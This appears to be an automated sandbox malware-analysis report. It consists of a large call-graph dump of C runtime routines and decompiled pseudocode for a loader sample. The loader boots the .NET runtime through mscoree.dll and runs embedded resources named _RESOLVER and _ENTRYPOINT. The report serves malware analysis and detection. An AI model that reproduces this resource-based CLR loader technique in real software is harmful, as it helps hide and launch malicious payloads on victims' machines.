df17e9 19861->19862 19863 df17f6 19862->19863 19864 df19f8 __lock 69 API calls 19862->19864 19863->19857 19865 df31a2 19863->19865 19864->19863 19866 df31ae ___lock_fhandle 19865->19866 19867 df17e3 _CallSETranslator 69 API calls 19866->19867 19868 df31b3 19867->19868 19869 df31e2 19868->19869 19870 df31c6 19868->19870 19871 df2c8d __lock 69 API calls 19869->19871 19872 df17e3 _CallSETranslator 69 API calls 19870->19872 19873 df31e9 19871->19873 19875 df31cb 19872->19875 19896 df321e 19873->19896 19878 df31d9 ___lock_fhandle 19875->19878 19879 df19f8 __lock 69 API calls 19875->19879 19878->19857 19879->19878 19881 df35b8 ___lock_fhandle 19880->19881 19882 df17e3 _CallSETranslator 69 API calls 19881->19882 19883 df35bd 19882->19883 19884 df2c8d __lock 69 API calls 19883->19884 19885 df35d0 19883->19885 19886 df35ee 19884->19886 19888 df35de ___lock_fhandle 19885->19888 19890 df19f8 __lock 69 API calls 19885->19890 19887 df3637 19886->19887 19891 df361f InterlockedIncrement 19886->19891 19892 df3605 InterlockedDecrement 19886->19892 20168 df3648 19887->20168 19888->19856 19890->19888 19891->19887 19892->19891 19893 df3610 19892->19893 19893->19891 19894 df2e06 _free 69 API calls 19893->19894 19895 df361e 19894->19895 19895->19891 19897 df3229 19896->19897 19898 df31fd 19896->19898 19897->19898 19899 df2f1d ___addlocaleref 8 API calls 19897->19899 19904 df3215 19898->19904 19900 df323f 19899->19900 19900->19898 19907 df3107 19900->19907 20167 df2df1 LeaveCriticalSection 19904->20167 19906 df321c 19906->19875 19908 df319d 19907->19908 19909 df3116 InterlockedDecrement 19907->19909 19908->19898 19921 df2fad 19908->19921 19910 df312c 19909->19910 19911 df3127 InterlockedDecrement 19909->19911 19912 df3139 19910->19912 19913 df3136 InterlockedDecrement 19910->19913 19911->19910 19914 df313f InterlockedDecrement 19912->19914 19915 df3144 19912->19915 19913->19912 19914->19915 19916 df314e InterlockedDecrement 19915->19916 19917 df3151 19915->19917 19916->19917 19918 df3168 InterlockedDecrement 19917->19918 19919 df317b InterlockedDecrement 19917->19919 19920 df318c InterlockedDecrement 19917->19920 19918->19917 19919->19917 19920->19908 19923 df3026 19921->19923 19928 df2fc2 19921->19928 19922 df3073 19936 df309c 19922->19936 19991 df4c20 19922->19991 19923->19922 19924 df2e06 _free 69 API calls 19923->19924 19927 df3047 19924->19927 19925 df2ff3 19930 df3011 19925->19930 19941 df2e06 _free 69 API calls 19925->19941 19931 df2e06 _free 69 API calls 19927->19931 19928->19923 19928->19925 19933 df2e06 _free 69 API calls 19928->19933 19932 df2e06 _free 69 API calls 19930->19932 19937 df305a 19931->19937 19938 df301b 19932->19938 19939 df2fe8 19933->19939 19934 df2e06 _free 69 API calls 19934->19936 19935 df30fb 19940 df2e06 _free 69 API calls 19935->19940 19936->19935 19949 df2e06 69 API calls _free 19936->19949 19942 df2e06 _free 69 API calls 19937->19942 19943 df2e06 _free 69 API calls 19938->19943 19951 df4abd 19939->19951 19945 df3101 19940->19945 19946 df3006 19941->19946 19947 df3068 19942->19947 19943->19923 19945->19898 19979 df4bb9 19946->19979 19950 df2e06 _free 69 API calls 19947->19950 19949->19936 19950->19922 19952 df4acc 19951->19952 19978 df4bb5 19951->19978 19953 df4add 19952->19953 19954 df2e06 _free 69 API calls 19952->19954 19955 df4aef 19953->19955 19956 df2e06 _free 69 API calls 19953->19956 19954->19953 19957 df4b01 19955->19957 19959 df2e06 _free 69 API calls 19955->19959 19956->19955 19958 df4b13 19957->19958 19960 df2e06 _free 69 API calls 19957->19960 19961 df4b25 19958->19961 19962 df2e06 _free 69 API calls 19958->19962 19959->19957 19960->19958 19963 df4b37 19961->19963 19964 df2e06 _free 69 API calls 19961->19964 19962->19961 19965 df4b49 19963->19965 19967 df2e06 _free 69 API calls 19963->19967 19964->19963 19966 df4b5b 19965->19966 19968 df2e06 _free 69 API calls 19965->19968 19969 df4b6d 19966->19969 19970 df2e06 _free 69 API calls 19966->19970 19967->19965 19968->19966 19971 df2e06 _free 69 API calls 19969->19971 19974 df4b7f 19969->19974 19970->19969 19971->19974 19972 df4b91 19973 df4ba3 19972->19973 19976 df2e06 _free 69 API calls 19972->19976 19977 df2e06 _free 69 API calls 19973->19977 19973->19978 19974->19972 19975 df2e06 _free 69 API calls 19974->19975 19975->19972 19976->19973 19977->19978 19978->19925 19980 df4c1c 19979->19980 19981 df4bc4 19979->19981 19980->19930 19982 df4bd4 19981->19982 19983 df2e06 _free 69 API calls 19981->19983 19984 df4be6 19982->19984 19985 df2e06 _free 69 API calls 19982->19985 19983->19982 19986 df4bf8 19984->19986 19987 df2e06 _free 69 API calls 19984->19987 19985->19984 19988 df4c0a 19986->19988 19989 df2e06 _free 69 API calls 19986->19989 19987->19986 19988->19980 19990 df2e06 _free 69 API calls 19988->19990 19989->19988 19990->19980 19992 df4c2f 19991->19992 19993 df3091 19991->19993 19994 df2e06 _free 69 API calls 19992->19994 19993->19934 19995 df4c37 19994->19995 19996 df2e06 _free 69 API calls 19995->19996 19997 df4c3f 19996->19997 19998 df2e06 _free 69 API calls 19997->19998 19999 df4c47 19998->19999 20000 df2e06 _free 69 API calls 19999->20000 20001 df4c4f 20000->20001 20002 df2e06 _free 69 API calls 20001->20002 20003 df4c57 20002->20003 20004 df2e06 _free 69 API calls 20003->20004 20005 df4c5f 20004->20005 20006 df2e06 _free 69 API calls 20005->20006 20007 df4c66 20006->20007 20008 df2e06 _free 69 API calls 20007->20008 20009 df4c6e 20008->20009 20010 df2e06 _free 69 API calls 20009->20010 20011 df4c76 20010->20011 20012 df2e06 _free 69 API calls 20011->20012 20013 df4c7e 20012->20013 20014 df2e06 _free 69 API calls 20013->20014 20015 df4c86 20014->20015 20016 df2e06 _free 69 API calls 20015->20016 20017 df4c8e 20016->20017 20018 df2e06 _free 69 API calls 20017->20018 20019 df4c96 20018->20019 20020 df2e06 _free 69 API calls 20019->20020 20021 df4c9e 20020->20021 20022 df2e06 _free 69 API calls 20021->20022 20023 df4ca6 20022->20023 20024 df2e06 _free 69 API calls 20023->20024 20025 df4cae 20024->20025 20026 df2e06 _free 69 API calls 20025->20026 20027 df4cb9 20026->20027 20028 df2e06 _free 69 API calls 20027->20028 20029 df4cc1 20028->20029 20030 df2e06 _free 69 API calls 20029->20030 20031 df4cc9 20030->20031 20032 df2e06 _free 69 API calls 20031->20032 20033 df4cd1 20032->20033 20034 df2e06 _free 69 API calls 20033->20034 20035 df4cd9 20034->20035 20036 df2e06 _free 69 API calls 20035->20036 20037 df4ce1 20036->20037 20038 df2e06 _free 69 API calls 20037->20038 20039 df4ce9 20038->20039 20040 df2e06 _free 69 API calls 20039->20040 20041 df4cf1 20040->20041 20042 df2e06 _free 69 API calls 20041->20042 20043 df4cf9 20042->20043 20044 df2e06 _free 69 API calls 20043->20044 20045 df4d01 20044->20045 20046 df2e06 _free 69 API calls 20045->20046 20047 df4d09 20046->20047 20048 df2e06 _free 69 API calls 20047->20048 20049 df4d11 20048->20049 20050 df2e06 _free 69 API calls 20049->20050 20051 df4d19 20050->20051 20052 df2e06 _free 69 API calls 20051->20052 20053 df4d21 20052->20053 20054 df2e06 _free 69 API calls 20053->20054 20055 df4d29 20054->20055 20056 df2e06 _free 69 API calls 20055->20056 20057 df4d31 20056->20057 20058 df2e06 _free 69 API calls 20057->20058 20059 df4d3f 20058->20059 20060 df2e06 _free 69 API calls 20059->20060 20061 df4d4a 20060->20061 20062 df2e06 _free 69 API calls 20061->20062 20063 df4d55 20062->20063 20064 df2e06 _free 69 API calls 20063->20064 20065 df4d60 20064->20065 20066 df2e06 _free 69 API calls 20065->20066 20067 df4d6b 20066->20067 20068 df2e06 _free 69 API calls 20067->20068 20069 df4d76 20068->20069 20070 df2e06 _free 69 API calls 20069->20070 20071 df4d81 20070->20071 20072 df2e06 _free 69 API calls 20071->20072 20073 df4d8c 20072->20073 20074 df2e06 _free 69 API calls 20073->20074 20075 df4d97 20074->20075 20076 df2e06 _free 69 API calls 20075->20076 20077 df4da2 20076->20077 20078 df2e06 _free 69 API calls 20077->20078 20079 df4dad 20078->20079 20080 df2e06 _free 69 API calls 20079->20080 20081 df4db8 20080->20081 20082 df2e06 _free 69 API calls 20081->20082 20083 df4dc3 20082->20083 20084 df2e06 _free 69 API calls 20083->20084 20085 df4dce 20084->20085 20086 df2e06 _free 69 API calls 20085->20086 20087 df4dd9 20086->20087 20088 df2e06 _free 69 API calls 20087->20088 20089 df4de4 20088->20089 20090 df2e06 _free 69 API calls 20089->20090 20091 df4df2 20090->20091 20092 df2e06 _free 69 API calls 20091->20092 20093 df4dfd 20092->20093 20094 df2e06 _free 69 API calls 20093->20094 20095 df4e08 20094->20095 20096 df2e06 _free 69 API calls 20095->20096 20097 df4e13 20096->20097 20098 df2e06 _free 69 API calls 20097->20098 20099 df4e1e 20098->20099 20100 df2e06 _free 69 API calls 20099->20100 20101 df4e29 20100->20101 20102 df2e06 _free 69 API calls 20101->20102 20103 df4e34 20102->20103 20104 df2e06 _free 69 API calls 20103->20104 20105 df4e3f 20104->20105 20106 df2e06 _free 69 API calls 20105->20106 20107 df4e4a 20106->20107 20108 df2e06 _free 69 API calls 20107->20108 20109 df4e55 20108->20109 20110 df2e06 _free 69 API calls 20109->20110 20111 df4e60 20110->20111 20112 df2e06 _free 69 API calls 20111->20112 20113 df4e6b 20112->20113 20114 df2e06 _free 69 API calls 20113->20114 20115 df4e76 20114->20115 20116 df2e06 _free 69 API calls 20115->20116 20117 df4e81 20116->20117 20118 df2e06 _free 69 API calls 20117->20118 20119 df4e8c 20118->20119 20120 df2e06 _free 69 API calls 20119->20120 20121 df4e97 20120->20121 20122 df2e06 _free 69 API calls 20121->20122 20123 df4ea5 20122->20123 20124 df2e06 _free 69 API calls 20123->20124 20125 df4eb0 20124->20125 20126 df2e06 _free 69 API calls 20125->20126 20127 df4ebb 20126->20127 20128 df2e06 _free 69 API calls 20127->20128 20129 df4ec6 20128->20129 20130 df2e06 _free 69 API calls 20129->20130 20131 df4ed1 20130->20131 20132 df2e06 _free 69 API calls 20131->20132 20133 df4edc 20132->20133 20134 df2e06 _free 69 API calls 20133->20134 20135 df4ee7 20134->20135 20136 df2e06 _free 69 API calls 20135->20136 20137 df4ef2 20136->20137 20138 df2e06 _free 69 API calls 20137->20138 20139 df4efd 20138->20139 20140 df2e06 _free 69 API calls 20139->20140 20141 df4f08 20140->20141 20142 df2e06 _free 69 API calls 20141->20142 20143 df4f13 20142->20143 20144 df2e06 _free 69 API calls 20143->20144 20145 df4f1e 20144->20145 20146 df2e06 _free 69 API calls 20145->20146 20147 df4f29 20146->20147 20148 df2e06 _free 69 API calls 20147->20148 20149 df4f34 20148->20149 20150 df2e06 _free 69 API calls 20149->20150 20151 df4f3f 20150->20151 20152 df2e06 _free 69 API calls 20151->20152 20153 df4f4a 20152->20153 20154 df2e06 _free 69 API calls 20153->20154 20155 df4f58 20154->20155 20156 df2e06 _free 69 API calls 20155->20156 20157 df4f63 20156->20157 20158 df2e06 _free 69 API calls 20157->20158 20159 df4f6e 20158->20159 20160 df2e06 _free 69 API calls 20159->20160 20161 df4f79 20160->20161 20162 df2e06 _free 69 API calls 20161->20162 20163 df4f84 20162->20163 20164 df2e06 _free 69 API calls 20163->20164 20165 df4f8f 20164->20165 20166 df2e06 _free 69 API calls 20165->20166 20166->19993 20167->19906 20171 df2df1 LeaveCriticalSection 20168->20171 20170 df364f 20170->19885 20171->20170 20173 df365d ___lock_fhandle 20172->20173 20174 df17e3 _CallSETranslator 69 API calls 20173->20174 20175 df3665 20174->20175 20176 df35ac _LocaleUpdate::_LocaleUpdate 71 API calls 20175->20176 20177 df366f 20176->20177 20203 df3349 20177->20203 20180 df2e88 __malloc_crt 69 API calls 20181 df3691 20180->20181 20182 df37c4 ___lock_fhandle 20181->20182 20210 df37ff 20181->20210 20182->19843 20185 df36c7 InterlockedDecrement 20187 df36ef InterlockedIncrement 20185->20187 20188 df36da 20185->20188 20186 df37d4 20186->20182 20190 df37e7 20186->20190 20192 df2e06 _free 69 API calls 20186->20192 20187->20182 20189 df3706 20187->20189 20188->20187 20191 df2e06 _free 69 API calls 20188->20191 20189->20182 20195 df2c8d __lock 69 API calls 20189->20195 20193 df3bbe _free 69 API calls 20190->20193 20194 df36eb 20191->20194 20192->20190 20193->20182 20194->20187 20196 df371a InterlockedDecrement 20195->20196 20198 df37ab InterlockedIncrement 20196->20198 20199 df3798 20196->20199 20220 df37c9 20198->20220 20199->20198 20201 df2e06 _free 69 API calls 20199->20201 20202 df37aa 20201->20202 20202->20198 20204 df3287 _LocaleUpdate::_LocaleUpdate 79 API calls 20203->20204 20205 df3359 20204->20205 20206 df337a 20205->20206 20207 df3368 GetOEMCP 20205->20207 20208 df337f GetACP 20206->20208 20209 df3391 20206->20209 20207->20209 20208->20209 20209->20180 20209->20182 20211 df3349 getSystemCP 81 API calls 20210->20211 20212 df381c 20211->20212 20215 df3870 IsValidCodePage 20212->20215 20217 df3826 setSBCS 20212->20217 20219 df3895 _memset __setmbcp_nolock 20212->20219 20213 df123c __NMSG_WRITE 6 API calls 20214 df36b8 20213->20214 20214->20185 20214->20186 20216 df3882 GetCPInfo 20215->20216 20215->20217 20216->20217 20216->20219 20217->20213 20223 df341e GetCPInfo 20219->20223 20289 df2df1 LeaveCriticalSection 20220->20289 20222 df37d0 20222->20182 20229 df3456 20223->20229 20232 df3500 20223->20232 20226 df123c __NMSG_WRITE 6 API calls 20228 df35aa 20226->20228 20228->20217 20233 df52d7 20229->20233 20231 df5189 ___crtLCMapStringA 83 API calls 20231->20232 20232->20226 20234 df3287 _LocaleUpdate::_LocaleUpdate 79 API calls 20233->20234 20235 df52e8 20234->20235 20243 df51eb 20235->20243 20238 df5189 20239 df3287 _LocaleUpdate::_LocaleUpdate 79 API calls 20238->20239 20240 df519a 20239->20240 20260 df4fa0 20240->20260 20244 df5205 20243->20244 20245 df5212 MultiByteToWideChar 20243->20245 20244->20245 20247 df523e 20245->20247 20255 df5237 20245->20255 20246 df123c __NMSG_WRITE 6 API calls 20248 df34b7 20246->20248 20249 df4906 std::exception::_Copy_str 69 API calls 20247->20249 20250 df5256 _memset __alloca_probe_16 20247->20250 20248->20238 20249->20250 20251 df5292 MultiByteToWideChar 20250->20251 20250->20255 20252 df52bc 20251->20252 20253 df52ac GetStringTypeW 20251->20253 20256 df51cd 20252->20256 20253->20252 20255->20246 20257 df51e8 20256->20257 20258 df51d7 20256->20258 20257->20255 20258->20257 20259 df2e06 _free 69 API calls 20258->20259 20259->20257 20262 df4fb9 MultiByteToWideChar 20260->20262 20263 df501f 20262->20263 20273 df5018 20262->20273 20269 df4906 std::exception::_Copy_str 69 API calls 20263->20269 20274 df503c __alloca_probe_16 20263->20274 20264 df123c __NMSG_WRITE 6 API calls 20265 df34d8 20264->20265 20265->20231 20266 df5072 MultiByteToWideChar 20267 df50da 20266->20267 20268 df508b 20266->20268 20271 df51cd __freea 69 API calls 20267->20271 20285 df5462 20268->20285 20269->20274 20271->20273 20272 df509f 20272->20267 20275 df50b6 20272->20275 20277 df50e2 20272->20277 20273->20264 20274->20266 20274->20273 20275->20267 20276 df5462 __crtLCMapStringA_stat LCMapStringW 20275->20276 20276->20267 20278 df4906 std::exception::_Copy_str 69 API calls 20277->20278 20280 df50fd __alloca_probe_16 20277->20280 20278->20280 20279 df5462 __crtLCMapStringA_stat LCMapStringW 20281 df513f 20279->20281 20280->20267 20280->20279 20282 df5167 20281->20282 20284 df5159 WideCharToMultiByte 20281->20284 20283 df51cd __freea 69 API calls 20282->20283 20283->20267 20284->20282 20286 df548d __crtLCMapStringA_stat 20285->20286 20287 df5472 20285->20287 20288 df54a4 LCMapStringW 20286->20288 20287->20272 20288->20272 20289->20222 20291 df4887 20290->20291 20292 df4879 20290->20292 20293 df3bbe _free 69 API calls 20291->20293 20292->20291 20297 df489d 20292->20297 20294 df488e 20293->20294 20295 df3b4f __fclose_nolock 9 API calls 20294->20295 20296 df4898 20295->20296 20296->19479 20297->20296 20298 df3bbe _free 69 API calls 20297->20298 20298->20294 20300 df3e9e EncodePointer 20299->20300 20300->20300 20301 df3eb8 20300->20301 20301->19492 20305 df3d90 20302->20305 20304 df3e91 20304->19494 20306 df3d9c ___lock_fhandle 20305->20306 20313 df1b4d 20306->20313 20312 df3dbf ___lock_fhandle 20312->20304 20314 df2c8d __lock 69 API calls 20313->20314 20315 df1b54 20314->20315 20316 df3dd0 DecodePointer DecodePointer 20315->20316 20317 df3dad 20316->20317 20318 df3dfd 20316->20318 20327 df3dca 20317->20327 20318->20317 20330 df53b0 20318->20330 20320 df3e60 EncodePointer EncodePointer 20320->20317 20321 df3e0f 20321->20320 20322 df3e34 20321->20322 20337 df2ed1 20321->20337 20322->20317 20324 df2ed1 __realloc_crt 73 API calls 20322->20324 20325 df3e4e EncodePointer 20322->20325 20326 df3e48 20324->20326 20325->20320 20326->20317 20326->20325 20363 df1b56 20327->20363 20331 df53ce HeapSize 20330->20331 20332 df53b9 20330->20332 20331->20321 20333 df3bbe _free 69 API calls 20332->20333 20334 df53be 20333->20334 20335 df3b4f __fclose_nolock 9 API calls 20334->20335 20336 df53c9 20335->20336 20336->20321 20341 df2ed8 20337->20341 20339 df2f17 20339->20322 20340 df2ef8 Sleep 20340->20341 20341->20339 20341->20340 20342 df4998 20341->20342 20343 df49ac 20342->20343 20344 df49a1 20342->20344 20346 df49b4 20343->20346 20351 df49c1 20343->20351 20345 df4906 std::exception::_Copy_str 69 API calls 20344->20345 20348 df49a9 20345->20348 20347 df2e06 _free 69 API calls 20346->20347 20360 df49bc _free 20347->20360 20348->20341 20349 df49f9 20352 df3eba __calloc_impl DecodePointer 20349->20352 20350 df49c9 HeapReAlloc 20350->20351 20350->20360 20351->20349 20351->20350 20354 df4a29 20351->20354 20356 df3eba __calloc_impl DecodePointer 20351->20356 20359 df4a11 20351->20359 20353 df49ff 20352->20353 20355 df3bbe _free 69 API calls 20353->20355 20357 df3bbe _free 69 API calls 20354->20357 20355->20360 20356->20351 20358 df4a2e GetLastError 20357->20358 20358->20360 20361 df3bbe _free 69 API calls 20359->20361 20360->20341 20362 df4a16 GetLastError 20361->20362 20362->20360 20366 df2df1 LeaveCriticalSection 20363->20366 20365 df1b5d 20365->20312 20366->20365 20368 df108b _memmove 20367->20368 20369 df10a6 SafeArrayDestroy 20368->20369 20370 df10ba SafeArrayCreateVector VariantInit VariantInit 20369->20370 20371 df110e VariantClear VariantClear 20370->20371 20371->19506 20373 df1b6b ___lock_fhandle 20372->20373 20374 df2c8d __lock 62 API calls 20373->20374 20375 df1b72 20374->20375 20376 df1ba0 DecodePointer 20375->20376 20378 df1c2b _doexit 20375->20378 20376->20378 20379 df1bb7 DecodePointer 20376->20379 20392 df1c79 20378->20392 20385 df1bc7 20379->20385 20381 df1c88 ___lock_fhandle 20381->19511 20383 df1bd4 EncodePointer 20383->20385 20384 df1c70 20386 df19e2 _doexit 4 API calls 20384->20386 20385->20378 20385->20383 20387 df1be4 DecodePointer EncodePointer 20385->20387 20388 df1c79 20386->20388 20390 df1bf6 DecodePointer DecodePointer 20387->20390 20389 df1c86 20388->20389 20397 df2df1 LeaveCriticalSection 20388->20397 20389->19511 20390->20385 20393 df1c7f 20392->20393 20394 df1c59 20392->20394 20398 df2df1 LeaveCriticalSection 20393->20398 20394->20381 20396 df2df1 LeaveCriticalSection 20394->20396 20396->20384 20397->20389 20398->20394 20400 df1b5f _doexit 69 API calls 20399->20400 20401 df1a13 20400->20401

                                                                          Executed Functions

                                                                          Function 00DF1010, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 106COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 19%
                                                                          			E00DF1010(struct HINSTANCE__* __ecx, intOrPtr* __edx, WCHAR* _a4) {
				char _v8;
				char _v16;
				char _v24;
				intOrPtr* _v28;
				void* _v32;
				void* _v36;
				char _v56;
				char _v72;
				signed int _t23;
				void* _t28;
				long _t29;
				intOrPtr* _t34;
				void* _t35;
				void* _t46;
				void* _t47;
				intOrPtr* _t51;
				intOrPtr* _t53;
				void* _t60;
				struct HINSTANCE__* _t61;
				long _t62;
				void* _t65;
				struct HRSRC__* _t66;
				intOrPtr* _t68;
				intOrPtr* _t69;
				signed int _t71;

				_t23 =  *0xdff000; // 0xaf6a40da
				 *[fs:0x0] =  &_v16;
				_v28 = __edx;
				_t61 = __ecx;
				_t66 = FindResourceW(__ecx, _a4, L"FILES");
				_t28 = LockResource(LoadResource(_t61, _t66));
				_t29 = SizeofResource(_t61, _t66);
				__imp__#411(0x11, 0, _t29, _t23 ^ _t71, _t60, _t65, _t47,  *[fs:0x0], E00DF8E70, 0xffffffff); // executed
				_t62 = _t29;
				__imp__#23(_t62,  &_v24);
				E00DF5520(_v24, _t28, _t29);
				__imp__#24(_t62);
				_t51 = _v28;
				 *((intOrPtr*)( *_t51 + 0xb4))(_t51, _t62,  &_v32);
				__imp__#16(_t62); // executed
				_t34 = _v32;
				_t35 =  *((intOrPtr*)( *_t34 + 0x40))(_t34,  &_v36);
				__imp__#411(0xc, 0, 0);
				_t68 = __imp__#8;
				 *_t68( &_v56);
				_v8 = 0;
				 *_t68( &_v72);
				_v8 = 1;
				_t53 = _v36;
				asm("movq xmm0, [ebp-0x34]");
				asm("movq [eax], xmm0");
				asm("movq xmm0, [ebp-0x2c]");
				asm("movq [eax+0x8], xmm0"); // executed
				 *((intOrPtr*)( *_t53 + 0x94))(_t53, _t35,  &_v72);
				_t69 = __imp__#9;
				 *_t69( &_v72);
				_t46 =  *_t69( &_v56);
				 *[fs:0x0] = _v16;
				return _t46;
			}




























                                                                          0x00df1027
                                                                          0x00df1032
                                                                          0x00df1038
                                                                          0x00df103b
                                                                          0x00df104c
                                                                          0x00df1057
                                                                          0x00df1061
                                                                          0x00df106e
                                                                          0x00df1074
                                                                          0x00df107b
                                                                          0x00df1086
                                                                          0x00df108f
                                                                          0x00df1095
                                                                          0x00df10a0
                                                                          0x00df10a7
                                                                          0x00df10ad
                                                                          0x00df10b7
                                                                          0x00df10c0
                                                                          0x00df10c6
                                                                          0x00df10d2
                                                                          0x00df10d8
                                                                          0x00df10df
                                                                          0x00df10e5
                                                                          0x00df10e9
                                                                          0x00df10ec
                                                                          0x00df10fa
                                                                          0x00df10fe
                                                                          0x00df1103
                                                                          0x00df1108
                                                                          0x00df110e
                                                                          0x00df1118
                                                                          0x00df111e
                                                                          0x00df1123
                                                                          0x00df1131

                                                                          APIs
                                                                          • FindResourceW.KERNEL32(?,?,FILES,AF6A40DA,?,?,00000000), ref: 00DF1046
                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00000000), ref: 00DF1050
                                                                          • LockResource.KERNEL32(00000000,?,?,00000000), ref: 00DF1057
                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00000000), ref: 00DF1061
                                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 00DF106E
                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DF107B
                                                                          • _memmove.LIBCMT ref: 00DF1086
                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00DF108F
                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 00DF10A7
                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000000), ref: 00DF10C0
                                                                          • VariantInit.OLEAUT32(?), ref: 00DF10D2
                                                                          • VariantInit.OLEAUT32(?), ref: 00DF10DF
                                                                          • VariantClear.OLEAUT32(?), ref: 00DF1118
                                                                          • VariantClear.OLEAUT32(?), ref: 00DF111E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$ResourceVariant$ClearCreateDataInitVector$AccessDestroyFindLoadLockSizeofUnaccess_memmove
                                                                          • String ID: Rv$FILES
                                                                          • API String ID: 2634884361-2067215473
                                                                          • Opcode ID: 60ab53c8ae259ab124fc5988cad34ef8f559a0cc5789c286c20bc5c410a9aae1
                                                                          • Instruction ID: 9a5c177477e09a7f60e285b261fd1838e593932272f9db533db1aac0f60639fa
                                                                          • Opcode Fuzzy Hash: 60ab53c8ae259ab124fc5988cad34ef8f559a0cc5789c286c20bc5c410a9aae1
                                                                          • Instruction Fuzzy Hash: DD310972D00209BFDB10EBA4DD49FAEBBBCEB89710F108169F905E7250DA756905CBB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF1140, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 79libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 75 df1140-df116a LoadLibraryW GetProcAddress 76 df116c-df118b 75->76 77 df11c7-df11e2 CorBindToRuntimeEx 75->77 80 df11bf-df11c5 76->80 81 df118d-df11a8 76->81 78 df11e6-df1239 call df1010 * 2 77->78 80->77 80->78 81->80 85 df11aa-df11bb 81->85 85->80
                                                                          C-Code - Quality: 65%
                                                                          			E00DF1140(struct HINSTANCE__* _a4) {
				char _v20;
				char _v24;
				intOrPtr* _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr* _v64;
				_Unknown_base(*)()* _t24;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t33;
				intOrPtr* _t39;
				intOrPtr* _t45;
				intOrPtr* _t46;

				_t24 = GetProcAddress(LoadLibraryW(L"mscoree.dll"), "CLRCreateInstance");
				_v24 = 0;
				if(_t24 == 0) {
					L5:
					__imp__CorBindToRuntimeEx(0, 0, 0, 0xdfcd24, 0xdfcd04,  &_v24);
					_t39 = _v48;
					L6:
					 *((intOrPtr*)( *_t39 + 0x28))(_t39);
					_t28 = _v52;
					 *((intOrPtr*)( *_t28 + 0x34))(_t28,  &_v36);
					_t30 = _v44;
					 *((intOrPtr*)( *_t30))(_t30, 0xdfcd44,  &_v52);
					E00DF1010(_a4, _v64, L"_RESOLVER"); // executed
					_t33 = E00DF1010(_a4, _v64, L"_ENTRYPOINT"); // executed
					return _t33;
				}
				_v20 = 0;
				 *_t24(0xdfcd14, 0xdfcd54,  &_v20); // executed
				_t45 = _v32;
				if(_t45 != 0) {
					 *((intOrPtr*)( *_t45 + 0xc))(_t45, L"v4.0.30319", 0xdfcd34,  &_v24);
					_t46 = _v40;
					if(_t46 != 0) {
						 *((intOrPtr*)( *_t46 + 0x24))(_t46, 0xdfcd24, 0xdfcd04,  &_v52);
					}
				}
				_t39 = _v36;
				if(_t39 != 0) {
					goto L6;
				} else {
					goto L5;
				}
			}



















                                                                          0x00df115a
                                                                          0x00df1160
                                                                          0x00df116a
                                                                          0x00df11c7
                                                                          0x00df11dc
                                                                          0x00df11e2
                                                                          0x00df11e6
                                                                          0x00df11e9
                                                                          0x00df11ec
                                                                          0x00df11f8
                                                                          0x00df11fb
                                                                          0x00df120c
                                                                          0x00df121a
                                                                          0x00df122e
                                                                          0x00df1239
                                                                          0x00df1239
                                                                          0x00df117b
                                                                          0x00df1183
                                                                          0x00df1185
                                                                          0x00df118b
                                                                          0x00df119f
                                                                          0x00df11a2
                                                                          0x00df11a8
                                                                          0x00df11bc
                                                                          0x00df11bc
                                                                          0x00df11a8
                                                                          0x00df11bf
                                                                          0x00df11c5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(mscoree.dll), ref: 00DF114E
                                                                          • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 00DF115A
                                                                          • CorBindToRuntimeEx.MSCOREE(00000000,00000000,00000000,00DFCD24,00DFCD04,00000000), ref: 00DF11DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: AddressBindLibraryLoadProcRuntime
                                                                          • String ID: CLRCreateInstance$_ENTRYPOINT$_RESOLVER$mscoree.dll$v4.0.30319
                                                                          • API String ID: 1913072896-462958808
